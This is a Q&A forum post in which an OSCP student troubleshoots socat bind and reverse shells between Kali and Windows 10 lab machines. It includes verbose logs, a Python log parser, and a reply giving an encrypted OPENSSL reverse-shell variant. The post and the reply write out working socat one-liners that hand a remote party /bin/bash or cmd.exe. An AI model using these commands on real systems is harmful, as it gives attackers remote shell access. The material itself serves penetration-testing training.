web-dev-qa-db-ja.com

How to create a socat Windows reverse shell

Hi, I need your help here!

I recently upgraded my OSCP material to the new OSCP 2020 version and came across the chapter on socat for creating encrypted bind/reverse shells.

I thought I understood how to use it, but when I tried to send an encrypted reverse shell from a Windows machine to my Kali machine, it failed.

I decided to do some trial and error with unencrypted bind shells on both sides.

Here is what worked for me:

  • Kali bind shell (connect to the Kali bind shell socket and get /bin/bash on Windows)
  • Kali reverse shell (send to the Windows listening socket and get /bin/bash on Windows)

Here is what did not work for me:

  • Windows bind shell (connect to the Windows listening shell socket and get cmd.exe)
  • Windows reverse shell (send to the Kali listening socket and get cmd.exe)

Here is what I did:

Kali Bind Shell - OK

Kali (192.168.119.145)

socat -d -d -d TCP4-LISTEN:4444,fork EXEC:/bin/bash

Windows 10 (192.168.145.10)

socat -d -d -d - TCP4:192.168.119.145:4444

Kali Reverse Shell - OK

Windows 10 (192.168.145.10)

socat -d -d -d TCP4-LISTEN:4444,fork STDOUT

Kali (192.168.119.145)

socat -d -d -d TCP4:192.168.145.10:4444 EXEC:/bin/bash

Windows Bind Shell - NOT OK

Windows 10 (192.168.145.10)

socat -d -d -d TCP4-LISTEN:4444,fork EXEC:cmd.exe

Kali (192.168.119.145)

socat -d -d -d - TCP4:192.168.145.10:4444

Windows Reverse Shell - NOT OK

Kali (192.168.119.145)

socat -d -d -d TCP4-LISTEN:4444,fork STDOUT

Windows 10 (192.168.145.10)

socat -d -d -d TCP4:192.168.119.145:4444 EXEC:cmd.exe

Here is what I get:

Windows Bind Shell - Windows machine

C:\Windows\system32>socat -d -d -d TCP4-LISTEN:443,fork EXEC:cmd.exe
2020/02/18 10:22:04 socat[3712] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 10:22:04 socat[3712] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 10:22:04 socat[3712] I This product includes software written by Tim Hudson ([email protected])
2020/02/18 10:22:04 socat[3712] I setting option "fork" to 1
2020/02/18 10:22:04 socat[3712] I socket(2, 1, 6) -> 5
2020/02/18 10:22:04 socat[3712] I starting accept loop
2020/02/18 10:22:04 socat[3712] N listening on AF=2 0.0.0.0:443
2020/02/18 10:22:25 socat[3712] I accept(5, {2, AF=2 192.168.119.145:36796}, 16) -> 6
2020/02/18 10:22:25 socat[3712] N accepting connection from AF=2 192.168.119.145:36796 on AF=2 192.168.145.10:443
2020/02/18 10:22:25 socat[3712] I permitting connection from AF=2 192.168.119.145:36796
2020/02/18 10:22:25 socat[3712] N forked off child process 4252
2020/02/18 10:22:25 socat[4252] I just born: child proces2020/02/18 10:22:25 socat[3712] I close(6)
2020/02/18 10:22:25 socat[4252] I just born: child process 4252
2020/02/18 10:22:25 socat[4252] I close(5)stening
2020/02/18 10:22:25 socat[4252] N forking off child, using socket for reading and writing
2020/02/18 10:22:25 socat[4252] I socketpair(1, 1, 0, {5,7}) -> 0
2020/02/18 10:22:25 socat[4252] N forked off child process 56402020/02/18 10:22:25 socat[5640] I just born: child proces
2020/02/18 10:22:25 socat[4252] N forked off child process 5640
2020/02/18 10:22:25 socat[5640] I close(5)
2020/02/18 10:22:25 socat[5640] I dup2(7, 0) -> 0
2020/02/18 10:22:25 socat[5640] I dup2(7, 1) -> 1ened all sock addresses
2020/02/18 10:22:25 socat[5640] I close(7) data transfer loop with FDs [6,6] and [5,5]
2020/02/18 10:22:25 socat[5640] N execvp'ing "cmd.exe"
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
2020/02/18 10:22:25 socat[4252] W read(5, 0x20044610, 8192): Connection reset by peer
2020/02/18 10:22:25 socat[3712] N childdied(): handling signal 202020/02/18 10:22:25 socat[4252] I childdied(signum=20)
2020/02/18 10:22:25 socat[4252] I waitpid(): child 5640 exited with status 0
2020/02/18 10:22:25 socat[4252] I childdied() finishedANG): No child processes
2020/02/18 10:22:25 socat[4252] N socket 2 to socket 1 is in error
2020/02/18 10:22:25 socat[4252] N socket 2 (fd 5) is at EOF
2020/02/18 10:22:25 socat[4252] I shutdown(6, 1)
2020/02/18 10:22:25 socat[4252] I terminated child did not leave data for us
2020/02/18 10:22:25 socat[4252] I poll timed out (no data within 0.500000 seconds)
2020/02/18 10:22:25 socat[4252] I shutdown(6, 2)
2020/02/18 10:22:25 socat[4252] I shutdown(5, 2)
2020/02/18 10:22:25 socat[4252] N exiting with status 0
2020/02/18 10:22:25 socat[3712] N childdied(): handling signal 20
2020/02/18 10:22:25 socat[3712] I childdied(signum=20)
2020/02/18 10:22:25 socat[3712] I childdied(20): cannot identify child 4252
2020/02/18 10:22:25 socat[3712] I waitpid(): child 4252 exited with status 0
2020/02/18 10:22:25 socat[3712] I waitpid(-1, {}, WNOHANG): No child processes
2020/02/18 10:22:25 socat[3712] I childdied() finished

Windows Bind Shell - Kali machine

[email protected]:/mnt/hgfs/Shared/OSCPLabsVPN/V2# socat -d -d -d - TCP4:192.168.145.10:443
2020/02/18 13:22:24 socat[9004] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 13:22:24 socat[9004] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/)
2020/02/18 13:22:24 socat[9004] I This product includes software written by Tim Hudson ([email protected])
2020/02/18 13:22:24 socat[9004] N reading from and writing to stdio
2020/02/18 13:22:24 socat[9004] N opening connection to AF=2 192.168.145.10:443
2020/02/18 13:22:24 socat[9004] I starting connect loop
2020/02/18 13:22:24 socat[9004] I socket(2, 1, 6) -> 5
2020/02/18 13:22:24 socat[9004] N successfully connected from local address AF=2 192.168.119.145:36796
2020/02/18 13:22:24 socat[9004] I resolved and opened all sock addresses
2020/02/18 13:22:24 socat[9004] N starting data transfer loop with FDs [0,1] and [5,5]
2020/02/18 13:22:25 socat[9004] N socket 2 (fd 5) is at EOF
2020/02/18 13:22:25 socat[9004] I poll timed out (no data within 0.500000 seconds)
2020/02/18 13:22:25 socat[9004] I shutdown(5, 2)
2020/02/18 13:22:25 socat[9004] N exiting with status 0

Windows Reverse Shell - Kali machine

[email protected]:/mnt/hgfs/Shared/OSCPLabsVPN/V2# socat -d -d -d TCP4-LISTEN:443 STDOUT
2020/02/18 13:07:13 socat[8925] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 13:07:13 socat[8925] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 13:07:13 socat[8925] I This product includes software written by Tim Hudson ([email protected])
2020/02/18 13:07:13 socat[8925] I socket(2, 1, 6) -> 5
2020/02/18 13:07:13 socat[8925] I starting accept loop
2020/02/18 13:07:13 socat[8925] N listening on AF=2 0.0.0.0:443
2020/02/18 13:07:18 socat[8925] I accept(5, {2, AF=2 192.168.145.10:61633}, 16) -> 6
2020/02/18 13:07:18 socat[8925] N accepting connection from AF=2 192.168.145.10:61633 on AF=2 192.168.119.145:443
2020/02/18 13:07:18 socat[8925] I permitting connection from AF=2 192.168.145.10:61633
2020/02/18 13:07:18 socat[8925] I close(5)
2020/02/18 13:07:18 socat[8925] N using stdout for reading and writing
2020/02/18 13:07:18 socat[8925] I resolved and opened all sock addresses
2020/02/18 13:07:18 socat[8925] N starting data transfer loop with FDs [6,6] and [1,1]
2020/02/18 13:07:18 socat[8925] N socket 1 (fd 6) is at EOF
2020/02/18 13:07:18 socat[8925] I poll timed out (no data within 0.500000 seconds)
2020/02/18 13:07:18 socat[8925] I shutdown(6, 2)
2020/02/18 13:07:18 socat[8925] N exiting with status 0

Windows Reverse Shell - Windows machine

C:\Windows\system32>socat -d -d -d TCP4:192.168.119.145:443 EXEC:cmd.exe
2020/02/18 10:06:39 socat[5396] I socat by Gerhard Rieger and contributors - see www.dest-unreach.org
2020/02/18 10:06:39 socat[5396] I This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/)
2020/02/18 10:06:39 socat[5396] I This product includes software written by Tim Hudson ([email protected])
2020/02/18 10:06:39 socat[5396] N opening connection to AF=2 192.168.119.145:443
2020/02/18 10:06:39 socat[5396] I starting connect loop
2020/02/18 10:06:39 socat[5396] I socket(2, 1, 6) -> 5
2020/02/18 10:06:39 socat[5396] N successfully connected from local address AF=2 192.168.145.10:61630
2020/02/18 10:06:39 socat[5396] N forking off child, using socket for reading and writing
2020/02/18 10:06:39 socat[5396] I socketpair(1, 1, 0, {6,7}) -> 0
2020/02/18 10:06:39 socat[5396] N forked off child process 2688
2020/02/18 10:06:39 socat[2688] I just born: child process 2688
2020/02/18 10:06:39 socat[5396] N forked off child process 2688
2020/02/18 10:06:39 socat[5396] I close(7)
2020/02/18 10:06:39 socat[5396] I resolved and opened all sock addresses
2020/02/18 10:06:39 socat[5396] N starting data transfer loop with FDs [5,5] and [6,6]
2020/02/18 10:06:39 socat[2688] I close(6)
2020/02/18 10:06:39 socat[2688] I dup2(7, 0) -> 0
2020/02/18 10:06:39 socat[2688] I dup2(7, 1) -> 1
2020/02/18 10:06:39 socat[2688] I close(7)
2020/02/18 10:06:39 socat[2688] N execvp'ing "cmd.exe"
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
2020/02/18 10:06:39 socat[5396] W read(6, 0x20044228, 8192): Connection reset by peer
2020/02/18 10:06:39 socat[5396] N childdied(): handling signal 20
2020/02/18 10:06:39 socat[5396] I childdied(signum=20)
2020/02/18 10:06:39 socat[5396] I exec'd process 2688 on socket 1 terminated
2020/02/18 10:06:39 socat[5396] I waitpid(): child 2688 exited with status 0
2020/02/18 10:06:39 socat[5396] I waitpid(-1, {}, WNOHANG): No child processes
2020/02/18 10:06:39 socat[5396] I childdied() finished
2020/02/18 10:06:39 socat[5396] N socket 2 to socket 1 is in error
2020/02/18 10:06:39 socat[5396] N socket 2 (fd 6) is at EOF
2020/02/18 10:06:39 socat[5396] I shutdown(5, 1)
2020/02/18 10:06:39 socat[5396] I terminated child did not leave data for us
2020/02/18 10:06:39 socat[5396] I poll timed out (no data within 0.500000 seconds)
2020/02/18 10:06:39 socat[5396] I shutdown(5, 2)
2020/02/18 10:06:39 socat[5396] I shutdown(6, 2)
2020/02/18 10:06:39 socat[5396] N exiting with status 0

What is going wrong here?

Why can't I attach the Windows cmd.exe process to the socket?

PS: I know the timestamps between my samples don't match.

4
R4Z3X
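As an added diagnostic that is not part of the original post: a small parser for socat's -d -d -d output that reduces logs like the ones above to an event timeline, so the point of failure can be placed exactly (here, the connection was accepted and cmd.exe was exec'd before the child's stdio pipe broke, so the network path is not the problem). The sample lines are a trimmed copy of the Windows bind-shell log above; the function names are my own.

```python
import re

# Constructed sample: a trimmed copy of the Windows-side bind-shell log above.
SAMPLE_LOG = """\
2020/02/18 10:22:04 socat[3712] N listening on AF=2 0.0.0.0:443
2020/02/18 10:22:25 socat[3712] N accepting connection from AF=2 192.168.119.145:36796 on AF=2 192.168.145.10:443
2020/02/18 10:22:25 socat[3712] N forked off child process 4252
2020/02/18 10:22:25 socat[5640] N execvp'ing "cmd.exe"
The process tried to write to a nonexistent pipe.
2020/02/18 10:22:25 socat[4252] W read(5, 0x20044610, 8192): Connection reset by peer
2020/02/18 10:22:25 socat[4252] I waitpid(): child 5640 exited with status 0
2020/02/18 10:22:25 socat[4252] N socket 2 (fd 5) is at EOF
2020/02/18 10:22:25 socat[4252] N exiting with status 0
"""

# "<date> <time> socat[<pid>] <level> <message>"; levels are D/I/N/W/E/F.
LINE_RE = re.compile(r'^(\S+ \S+) socat\[(\d+)\] ([DINWEF]) (.*)$')

# Events worth keeping, in the form (name, regex with one capture group).
EVENTS = [
    ("listen", re.compile(r'listening on AF=\d+ (\S+)')),
    ("accept", re.compile(r'accepting connection from AF=\d+ (\S+)')),
    ("connect", re.compile(r'successfully connected from local address AF=\d+ (\S+)')),
    ("exec", re.compile(r'execvp\'ing "([^"]+)"')),
    ("reset", re.compile(r'(Connection reset by peer)')),
    ("child_exit", re.compile(r'child (\d+) exited with status')),
    ("eof", re.compile(r'socket \d+ \(fd \d+\) (is at EOF)')),
]

def parse_socat_log(text):
    """Return [(pid, event, detail)] for the recognised events, in log order.
    Lines without the socat prefix come from the exec'd child's own stdio
    (e.g. cmd.exe's error) and are kept as 'child_output' events."""
    timeline = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            if line.strip():
                timeline.append((None, "child_output", line.strip()))
            continue
        _ts, pid, _level, msg = m.groups()
        for name, rx in EVENTS:
            hit = rx.search(msg)
            if hit:
                timeline.append((int(pid), name, hit.group(1)))
                break
    return timeline

def diagnose(timeline):
    """Classify how the session ended from the order of events."""
    names = [e for _, e, _ in timeline]
    if not ({"accept", "connect"} & set(names)):
        return "no TCP connection was established"
    if "exec" in names and ("child_output" in names or "reset" in names):
        return "EXEC child started but its stdio pipe broke before any data was exchanged"
    if "eof" in names:
        return "peer closed the connection (check the other side's log)"
    return "session ended without a recognised failure event"
```

Feeding the Kali-side log from the same attempt gives only listen/accept/eof, which the classifier reports as the peer closing the connection, consistent with the Windows side being where the child died.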

Windows machine (copy the .pem file from Kali):

socat OPENSSL-LISTEN:443,cert=bind_Shell.pem,verify=0 STDOUT

Kali machine: socat OPENSSL:192.168.X.X:443,verify=0 EXEC:/bin/bash

0
PirateZA